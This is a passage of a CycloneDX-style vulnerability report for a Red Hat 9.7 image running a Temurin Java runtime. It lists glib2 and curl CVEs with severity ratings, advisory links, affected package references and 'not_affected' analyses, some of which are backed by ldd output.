          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-14087",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in GLib (Gnome Lib). This vulnerability allows a remote attacker to cause heap corruption, leading to a denial of service or potential code execution via a buffer-underflow in the GVariant parser when processing maliciously crafted input strings.",
      "recommendation": "Upgrade glib2 to version 2.68.4-18.el9_7.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14087"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15953"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15969"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15971"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7461"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14087"
        },
        {
          "url": "https://bugzilla.redhat.com/2419093"
        },
        {
          "url": "https://bugzilla.redhat.com/2421339"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419093"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-15971.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-frh9-7wfp-w73p"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3834"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4933"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4934"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-14087.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-15971.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14087"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14087"
        }
      ],
      "published": "2025-12-10T09:15:47+00:00",
      "updated": "2026-05-11T23:17:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
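        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc; glib2 (libglib-2.0) does not appear among its dependencies:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)\nNote: the ldd output above was captured on an aarch64 build and lists only the link-time dependencies of the java launcher; libraries loaded at run time (e.g. via dlopen) and the amd64 image described by this BOM are not covered by it."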
      }
    },
    {
      "id": "CVE-2025-14512",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in glib. This vulnerability allows a heap buffer overflow and denial-of-service (DoS) via an integer overflow in GLib's GIO (GLib Input/Output) escape_byte_string() function when processing malicious file or remote filesystem attribute values.",
      "recommendation": "Upgrade glib2 to version 2.68.4-18.el9_7.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15953"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15969"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15971"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7461"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14512"
        },
        {
          "url": "https://bugzilla.redhat.com/2419093"
        },
        {
          "url": "https://bugzilla.redhat.com/2421339"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2421339"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-15971.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-2p5v-p767-wqv5"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3845"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4935"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4936"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-14512.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-15971.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14512"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14512"
        }
      ],
      "published": "2025-12-11T07:16:00+00:00",
      "updated": "2026-05-11T23:17:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-14524",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        601
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a cross-protocol redirect to a second URL that uses an IMAP, LDAP,\nPOP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new\ntarget host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14524"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g897-jvjx-78vg"
        },
        {
          "url": "https://hackerone.com/reports/3459417"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14524"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14524"
        }
      ],
      "published": "2026-01-08T10:15:46+00:00",
      "updated": "2026-01-20T14:53:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-14819",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "When doing TLS related transfers with reused easy or multi handles and\naltering the  `CURLSSLOPT_NO_PARTIALCHAIN` option, libcurl could accidentally\nreuse a CA store cached in memory for which the partial chain option was\nreversed. Contrary to the user's wishes and expectations. This could make\nlibcurl find and accept a trust chain that it otherwise would not.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14819"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14819"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14819.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14819.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-vqhr-m87q-9jqh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14819"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14819"
        }
      ],
      "published": "2026-01-08T10:15:46+00:00",
      "updated": "2026-01-20T14:51:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
